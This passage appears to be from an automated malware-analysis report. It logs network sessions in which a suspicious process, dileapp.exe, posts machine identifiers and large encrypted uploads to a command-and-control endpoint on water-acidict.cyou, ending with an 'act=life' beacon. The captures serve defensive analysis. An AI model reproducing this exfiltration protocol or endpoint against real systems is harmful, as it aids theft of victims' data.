                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pd2SaVMnuYU8slpcI%2B6wjF96VbUsdtlyw062xBOLtaap6H2ORDtwCSnr9hqv7y%2FrEvmgX083tXprSVe4HRXrGidzLrzY1%2Fqh%2BNv3BrUh5V735m3hNDnstq%2BufpvFpnjkPg%2Bkbyg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed662b833350-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1994&rtt_var=757&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2151&delivery_rate=1437715&cwnd=173&unsent_bytes=0&cid=1ddef182a3da8007&ts=732&x=0"
                                                                                                                                      2024-11-29 22:10:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.449759172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:22 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=7O7ELFMD4GMH0W3O
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18356
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:22 UTC15331OUTData Raw: 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 4f 37 45 4c 46 4d 44 34 47 4d 48 30 57 33 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 37 4f
                                                                                                                                      Data Ascii: --7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="pid"2--7O7ELFMD4GMH0W3OContent-Disposition: form-data; name="lid"c2CoW0--bandl--7O
                                                                                                                                      2024-11-29 22:10:22 UTC3025OUTData Raw: 23 1b 14 95 d8 67 39 b2 fd cb d1 0e 65 9d 61 cd b4 aa aa a1 ff 06 ed 3a bc 4a 3a 3b e2 f5 e9 8b 6e 77 18 74 82 a0 b0 d1 ae 4e 72 af 6c 03 bb ef c0 70 76 68 70 6f b8 ab e0 81 89 d2 ce 70 34 95 3f d4 6e 77 97 74 7a df db 4a ab d9 3a a6 45 b3 54 7c 31 23 5d 55 db 3f 35 ab 59 2f 56 9a f4 45 bb 41 ec 02 5f 8c 47 52 99 43 fc b6 3f 53 d6 79 f9 f3 1a 0e ca ab 93 c8 9f 85 77 5e 16 97 be 18 eb 3d 73 d9 32 ab fe 33 c7 83 ce dc 49 e4 3f b3 1b ea ee a4 d7 a3 91 94 7c 88 af f8 cf ec 5e 94 ce 7e 2c e8 c4 3b 69 fc e7 a5 81 e9 5a 24 9a ba e3 0e 7a b3 b9 ed c8 7b 0f b6 d9 b0 b4 ae ef a3 5d ed c6 1f d3 ef f1 ea c5 f6 b4 94 f4 27 ee 0d 47 53 87 0e f1 bf 6d 76 32 b4 bd 6d a4 37 13 bb cf e9 a5 fc 85 8d f5 95 35 7a c0 7d 85 b5 0d 77 54 d1 d3 26 3b d7 a3 37 ae 53 a3 ed b8 29 da
                                                                                                                                      Data Ascii: #g9ea:J:;nwtNrlpvhpop4?nwtzJ:ET|1#]U?5Y/VEA_GRC?Syw^=s23I?|^~,;iZ$z{]'GSmv2m75z}wT&;7S)
                                                                                                                                      2024-11-29 22:10:23 UTC1021INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:23 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ukca50kjof1k98jccfscffa0pp; expires=Tue, 25-Mar-2025 15:57:02 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EdujJ43PWeFIQvw%2B6%2FQXBTZBJqwJSPeCilVlcL3CngZ3a54ebGBQB9xxHn7jJBggxpQ4S%2BWthWou047GTJZ4ZWK%2B3tUum7AaSeZTvfapynn5wyGbXaqM4dqx3wbAPIY0PMx3mA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed6e2ee7c331-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1824&min_rtt=1717&rtt_var=720&sent=13&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19318&delivery_rate=1700640&cwnd=74&unsent_bytes=0&cid=eed05278dca39b1a&ts=1103&x=0"
                                                                                                                                      2024-11-29 22:10:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.449760172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:24 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=A4G2E3A0678O4
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 305412
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38 4f 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 41 34 47 32 45 33 41 30 36 37 38
                                                                                                                                      Data Ascii: --A4G2E3A0678O4Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--A4G2E3A0678O4Content-Disposition: form-data; name="pid"1--A4G2E3A0678O4Content-Disposition: form-data; name="lid"c2CoW0--bandl--A4G2E3A0678
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 92 62 39 99 4d 76 6e 86 44 9d 11 d3 1c 49 03 6b 6c 5e 7b 44 20 ca cc 24 86 22 7d 2c 87 3f 18 c9 48 35 0e 7f d7 1e 49 2b ba dc 90 e9 0e ee 31 1f e3 a5 cc 35 b1 52 56 fd 01 b5 53 20 84 1d 1c 01 47 20 34 10 87 1e 53 45 00 e2 4d 98 5c 33 49 43 11 3f 57 ad 49 fd e9 f6 dc 61 2b e8 b2 15 e9 3e 34 b7 89 b7 b5 ce 2f 88 d4 f6 ed 3d c7 d4 c3 95 b6 8e b8 d7 bf 28 8c d3 7a 3e ff 54 f3 69 0c 4f 8a 01 77 b1 be 6b a7 60 db e5 74 1d 11 e3 cd a9 dc 9f a9 3e 1a 10 4e 0c b3 d0 5e 91 1e 3b 6e ad e1 eb 0d 26 77 d9 d6 e6 00 bc 5d 52 a9 bb 71 a7 a8 62 41 0f dc 15 84 cd 27 c0 d1 e0 1e b8 0d 43 a1 8b c5 21 8d 0f dd 83 60 65 f0 43 bb f6 f4 61 16 c7 96 8a 90 8f 08 c3 96 b4 50 f5 69 63 66 ba 81 cb 4f 04 b1 0d d5 f9 cd 57 a1 d7 bb a3 ba fb c3 4f 01 09 e2 90 02 4b 8e 59 8e b3 59 e5 d1
                                                                                                                                      Data Ascii: b9MvnDIkl^{D $"},?H5I+15RVS G 4SEM\3IC?WIa+>4/=(z>TiOwk`t>N^;n&w]RqbA'C!`eCaPicfOWOKYY
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 59 7b 14 7a 95 26 02 28 18 2d 35 c0 f4 1c 91 b6 38 c0 c8 ba 93 15 76 13 f9 51 66 5a 37 5a 43 1d 8f 07 59 ea 98 ed 73 c8 ac 9e 5c fb 20 8c a5 55 30 3d 68 ce 40 6f e8 0d 81 4b 0f 40 9f 4e 2e b8 1f 71 52 e6 3e df c6 55 34 75 94 d9 7f 6f 96 61 62 98 5d 50 c6 21 40 22 bd 6e 97 01 f7 cd 63 36 07 06 77 01 09 4e a0 68 a6 e6 c8 81 1e 6b ab bc b2 be 6a 5b c3 bd 99 bf f3 02 84 e5 cd 13 97 f4 fd 0d 53 5c 68 2a 4a 6c ea 6d b0 4c 17 d4 98 90 bf 86 c8 b0 97 72 17 1c 77 53 35 a6 50 fa f1 27 37 49 f8 3e b0 dc 41 f9 ad 36 a4 04 13 50 c5 72 5c e2 2e 1f 74 5b c5 6f e5 5f b3 97 cd 8e bb dc ab ac 62 e5 b9 79 f0 47 02 18 84 60 9a d5 d7 ae 45 ac b3 9f 00 77 de b2 a0 88 38 2d 0e c3 35 5f 3f ca d7 c4 d6 3b da 42 29 ea cb af 2f f7 3e 96 c2 07 1d 0d 8d f4 9f 39 74 67 70 ea 38 a6 7c
                                                                                                                                      Data Ascii: Y{z&(-58vQfZ7ZCYs\ U0=h@oK@N.qR>U4uoab]P!@"nc6wNhkj[S\h*JlmLrwS5P'7I>A6Pr\.t[o_byG`Ew8-5_?;B)/>9tgp8|
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 82 ae 78 74 93 18 dd 18 ec c7 cc 0b 15 c8 7b ca ab 6c c4 2d 61 8e 22 6d 8c 83 79 e4 55 86 6b a7 a2 56 d8 35 0c 48 5f bd ec 78 68 ec 8e fe 23 57 b0 34 fe ca 29 9d 90 5c ae d8 91 d8 e0 8b 6c 3a ab da 4c 49 11 36 29 5b 6d 27 1c 32 c9 4f f4 79 a5 05 3b b2 f7 17 94 b8 b1 75 89 c5 f9 ed a2 9f 98 9a ef 8e 5e d4 60 be 5a 49 e7 f2 20 b6 39 86 b9 f3 ee fd 67 cb a5 6f 89 99 64 01 01 8e db bf 79 ed 58 50 ff 9c d1 6f 93 ae 65 00 79 7b 59 5b 05 58 87 d8 39 51 b9 fd 19 11 b4 65 6b 7a 7b 91 61 b6 a5 5f 87 e2 bd f4 f6 ba 85 a2 52 15 c9 ed ee b8 dc 2d dc d5 76 f3 14 62 18 39 13 78 9d 89 9b e4 88 42 c7 79 c3 fc 24 37 ec 26 dc 38 03 2b 21 bf 2f a0 e2 fd df f5 63 8e ad 3a de ec 45 5d b4 78 e9 14 13 f3 86 b4 a6 58 d2 a5 a1 a9 db 29 84 d5 3f 57 a6 73 9d 3e 7d 8b a6 00 dd 5d e3
                                                                                                                                      Data Ascii: xt{l-a"myUkV5H_xh#W4)\l:LI6)[m'2Oy;u^`ZI 9godyXPoey{Y[X9Qekz{a_R-vb9xBy$7&8+!/c:E]xX)?Ws>}]
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: ff 7d ad 91 41 0d 08 0e 5e fd 02 ad 6c a4 4d a3 1f 3f 2f a7 67 96 b3 39 fc 84 56 e2 49 4b 30 7c c7 9b 7a bd 87 03 59 d6 e8 ef a8 92 a5 2b 9c 37 57 b0 37 18 7c 25 81 7c 95 01 e5 f6 22 e1 f0 26 73 a5 93 e7 05 ef 31 fe d2 35 b3 8f b9 d6 51 86 bf 15 a4 f8 02 20 cb 42 5a a1 e7 2f 21 ac 4a 0e 25 b7 6d 36 ab b6 2f 80 3e 05 3a 7b 58 9a 9d fc 2c 3d 58 f9 c8 a0 9b 12 b0 62 13 4d 9a 61 9b ca 69 4d ea 03 da 85 57 b5 58 38 04 4f 24 ea 8a 8c 09 96 76 b7 48 32 82 6b dd 26 db f5 93 09 f2 ad 9d ce af 48 ad 09 25 3b e3 26 c9 43 49 3a 11 9a 1d e5 85 1a a0 c8 6d 30 ad af 50 ba 26 7f d1 c0 5e bf 9f 37 5e 8b 6b 5c aa 74 13 0c 57 cb 4e 5a dc 0f e6 1b 1d 96 53 5a 9e 73 c2 bb 34 b8 c3 a4 19 83 1e 91 b6 ab 37 fe 3d 37 02 12 8a 89 20 2f d0 f9 c1 7d 57 db b6 fb 9e 1b fa 72 b9 0f 93
                                                                                                                                      Data Ascii: }A^lM?/g9VIK0|zY+7W7|%|"&s15Q BZ/!J%m6/>:{X,=XbMaiMWX8O$vH2k&H%;&CI:m0P&^7^k\tWNZSZs47=7 /}Wr
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 0b 5a 69 f8 fb 13 3d 4e 50 38 f1 4d ab ea 25 81 78 bd 19 33 ac a0 dc 6f b5 b4 0e 02 b9 ee 04 07 e1 cd e4 de df 97 3b a3 6b 17 df 38 1f 7c 79 b9 13 f7 e1 e5 65 cd fb b9 ff 74 58 83 e3 02 a8 a3 8e d0 08 d0 bb c3 66 12 70 94 0f 4f 49 b4 2b d2 ae cd 32 90 69 c9 ca 1e a2 23 93 55 12 d3 6c c8 f6 84 01 c0 9a d8 f0 e4 05 02 ed d3 60 2b 2e 58 ee da eb 95 1e 66 7a 43 2b 91 6a e6 d5 f4 d1 f5 73 d6 64 bc e7 c3 d6 3d b3 d9 ec f5 28 18 aa 5d b8 50 68 4e 68 5e 78 55 6b dd 72 df 92 7e 46 88 a8 b8 a8 f0 e6 64 37 26 23 d4 74 d3 3c da d9 04 66 85 02 87 7c 77 bf ec db e0 c6 84 e8 92 dd ef fe 64 ea 6c e3 db 0b f2 2d 87 04 01 a9 df 24 49 69 20 65 d7 9a ac 2f 09 52 1d 36 fd 44 98 9f 4c 60 c3 c5 40 47 84 d5 5b cb df 96 6f 2d 01 d1 bf 9d 3e 57 84 1e 13 e9 a4 0f 9f 58 05 5b ee 7d
                                                                                                                                      Data Ascii: Zi=NP8M%x3o;k8|yetXfpOI+2i#Ul`+.XfzC+jsd=(]PhNh^xUkr~Fd7&#t<f|wdl-$Ii e/R6DL`@G[o->WX[}
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 8e 9d 6f ea 75 30 64 d6 e5 95 94 da ca ed df a6 27 29 7a b5 d5 13 25 9c 04 d5 fd cb 02 8d 0f 68 2c 9e 52 5b 19 93 0f 01 96 4e 82 4f c5 f5 0d 86 1e ec 3b 64 a1 fa cd 47 c1 cf a5 29 16 fd e0 30 8c 90 79 43 e7 03 a8 42 62 c4 da 0f 1c c8 7f 3c 4c 30 f1 f2 3d a2 9e e4 31 6e be 96 b2 c3 d3 fb ae 46 66 da ae c3 c4 63 43 e9 11 fc bb 7f a6 7d 35 8a 3c 22 77 ee 6d b2 e7 d5 14 fa 25 25 57 cc fc 35 21 a4 37 bd e5 59 0e b0 e8 a7 e4 f4 b1 c3 84 27 3d dc b7 79 a5 9a 35 b4 a3 d2 27 6d 32 2f ca fc f6 7e 74 22 80 51 79 a1 d0 30 bb e8 f2 2c 6b cf 79 e5 16 06 11 bb b9 b5 8c 27 bb 0f e7 ac 19 b3 1f bf d3 2d 14 82 39 c7 35 bf 2a 68 5c 0d ab c8 0a bc 7f 29 88 97 09 13 c2 6a 33 17 ad 06 b4 45 09 af 6e f8 9d 63 e4 33 f5 9d fb 43 5e eb af b4 2d df 70 cb 8c e1 0c 40 ec c9 d8 7e b8
                                                                                                                                      Data Ascii: ou0d')z%h,R[NO;dG)0yCBb<L0=1nFfcC}5<"wm%%W5!7Y'=y5'm2/~t"Qy0,ky'-95*h\)j3Enc3C^-p@~
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: ec f4 c5 01 f3 16 03 6f 3b 96 fc ae 26 62 e1 31 65 e7 05 ef 60 e0 8a 98 fc 57 2b 8a c2 8d 5c de 08 be 43 b8 cb 09 f9 5d c8 4d 28 b2 d5 7c 10 2f 4d 9b 7b 02 2c c5 e8 e1 6e c3 1f 50 ac 21 8b 0e 91 57 ce 82 7e 46 ca f6 20 47 72 c4 3b a8 d7 4b 29 70 9b c9 dc 20 ba 7c 07 6d 57 e0 26 73 65 e2 fe 03 31 e2 f4 a2 97 03 70 53 4c de 2d 97 27 dc e0 40 4e 4c 0d 22 77 df 78 4e d8 8a 20 7b 6c ef 01 2f 21 39 3c da a5 02 bf 0d 9b 9a 4d d2 90 80 7a ff 7a 7f 7b 7b 84 b9 39 5f ee 91 f3 ad ff 19 7f 2f aa f4 c3 df cd da 1b 33 df b9 ae 6c 6a 32 d7 3d e3 ba 00 38 b5 0d 2c ec f3 3c ac f0 2a da 7b 70 af 07 1c 76 f0 6b bc bd 75 49 82 c7 45 a9 1a 39 fb ca aa b6 2c c6 48 69 c7 2a f7 b2 81 f2 1f 89 2c 16 19 a7 ce d6 3f c7 95 44 73 ea 5e 3e 73 47 05 27 9c 52 7b c6 e5 d8 2f 22 2a ef d4
                                                                                                                                      Data Ascii: o;&b1e`W+\C]M(|/M{,nP!W~F Gr;K)p |mW&se1pSL-'@NL"wxN {l/!9<Mzz{{9_/3lj2=8,<*{pvkuIE9,Hi*,?Ds^>sG'R{/"*
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: d1 13 6c 41 57 87 10 26 13 98 df 64 72 f5 b1 5b 2d 5e 72 54 5d 2b fe 94 4f bf 48 25 12 d8 68 30 f9 ca e9 52 05 46 cf e5 5c f8 db 60 67 21 da 3e f6 86 ab 5c 10 b1 39 92 00 09 68 32 51 90 f2 f6 87 ea 74 bd 61 43 92 fa 6c 66 d8 1e 45 92 bd 78 38 eb d1 05 09 ea 8e 8c 67 f6 95 fa f2 b1 17 46 0f 9c 53 60 d2 0f 64 87 be bf cf 03 73 5d 0d 43 1f c5 fc b5 6d 0d 67 82 00 1c 6b 9f 0a 10 ef 5a 71 a1 ee d5 83 eb 99 6f 67 ea f2 63 72 0b 60 d2 19 74 fb 7d d5 73 5f 3b 0b 3d 0f 5f 36 0f 5f 4f 33 86 11 e7 4d c6 5d f4 08 30 6c 0f 3f 58 d7 f9 80 70 f6 f8 7e fe a7 4f 3e 6d 1e d0 9f e2 57 9b 99 79 6d cd 32 eb ad e3 4e 8d f8 52 ef 84 48 bb 58 23 65 fb b2 8d a8 23 aa 3a ad b6 60 ec 79 5a 7f fb 93 a3 77 aa df 9a 05 01 97 54 64 f3 14 b2 27 da 5b 87 aa fd ca b9 44 c6 4b db fa 0d 9d
                                                                                                                                      Data Ascii: lAW&dr[-^rT]+OH%h0RF\`g!>\9h2QtaClfEx8gFS`ds]CmgkZqogcr`t}s_;=_6_O3M]0l?Xp~O>mWym2NRHX#e#:`yZwTd'[DK
                                                                                                                                      2024-11-29 22:10:24 UTC15331OUTData Raw: 5e 55 ae 5d 99 de 96 ce 6c 74 ef 18 69 ca 4d e4 f6 98 cb d8 d3 31 34 64 3e 78 e6 a8 32 33 f3 e1 17 e3 25 1e 31 25 9a ee cb 3c 55 86 c3 7c c4 b2 bb 64 84 27 2d 46 9b f7 11 7f 7b bf 7a ae b6 6e 7d 3c 3f 23 dc f3 a8 69 b6 cc ea 97 e3 bf a7 9d f5 cd e0 e0 7c d3 d1 27 57 06 fc 6a 3b b7 e6 21 ec e1 ab c0 0e df f3 ee 1e c3 04 12 e9 29 85 5e 93 c4 03 85 e1 4a 4b 7a eb 4b 22 da 86 5b 22 22 e1 c8 de 76 98 54 cb b7 d8 2d ee c2 30 5a 2b 88 91 13 bb 30 8d c5 ec be 82 c9 87 98 d5 14 43 f5 04 3d 55 5b a2 02 7d 72 68 a2 5d 98 ac 22 56 a6 73 9e 48 f8 73 d0 a6 e1 b3 83 2e 2b 7e 8f 47 1b cc 2f 19 f3 40 43 de bc ff 14 40 36 8d f7 e4 7f 45 37 8e 5e 53 ee 57 df 0c 6c c5 56 4f db 77 1a 02 41 8c 88 c6 9c 2f 91 c4 e9 ec 4e 6c 55 77 76 40 d9 a6 bd 00 26 6c ac 95 b0 9e 06 dc 41 34
                                                                                                                                      Data Ascii: ^U]ltiM14d>x23%1%<U|d'-F{zn}<?#i|'Wj;!)^JKzK"[""vT-0Z+0C=U[}rh]"VsHs.+~G/@C@6E7^SWlVOwA/NlUwv@&lA4
                                                                                                                                      2024-11-29 22:10:26 UTC1015INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=pablmqhmh8e907drugkktsb37d; expires=Tue, 25-Mar-2025 15:57:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UrtTY9q7IllkDMBEbxDfrShWgM7NAYwfieLlGmd7MiFjWdfWKTB2KcrSTwqYIk0XkMTmAo3w0YU2zr1auuluk3CmSTsttqbTxHRNQld2RHZBd6ljurtCDy7jNbdK7J9KEbvufpg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed759a46c35e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=114&recv=323&lost=0&retrans=1&sent_bytes=4230&recv_bytes=307186&delivery_rate=160518&cwnd=59&unsent_bytes=0&cid=e590ecbcff20485b&ts=2074&x=0"


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.449762172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:25 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=D6TA5K3NY9GB10
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8760
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:25 UTC8760OUTData Raw: 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e 59 39 47 42 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 44 36 54 41 35 4b 33 4e
                                                                                                                                      Data Ascii: --D6TA5K3NY9GB10Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--D6TA5K3NY9GB10Content-Disposition: form-data; name="pid"2--D6TA5K3NY9GB10Content-Disposition: form-data; name="lid"c2CoW0--bandl--D6TA5K3N
                                                                                                                                      2024-11-29 22:10:26 UTC1024INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:26 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=q9mqsm1krusn03sh21elu48rhu; expires=Tue, 25-Mar-2025 15:57:04 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NY%2FyNn4pij6D88sO27xQJz8Z5hZz9RSvWSkRrRaq%2FFWI26wCfOSGZoc2IFTIEqYcAmGv%2FiH0BoEfmjLutAHeGcJc34eZ4cagmljkM%2FeWFjO8NFsnRuY0uk%2BtOsJoixmNkfDV%2FsI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed7dcf700f83-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1680&min_rtt=1664&rtt_var=636&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9697&delivery_rate=1754807&cwnd=223&unsent_bytes=0&cid=b333488df87c1b04&ts=1130&x=0"
                                                                                                                                      2024-11-29 22:10:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.449763172.67.156.2174435448C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:25 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:26 UTC1015INHTTP/1.1 200 OK
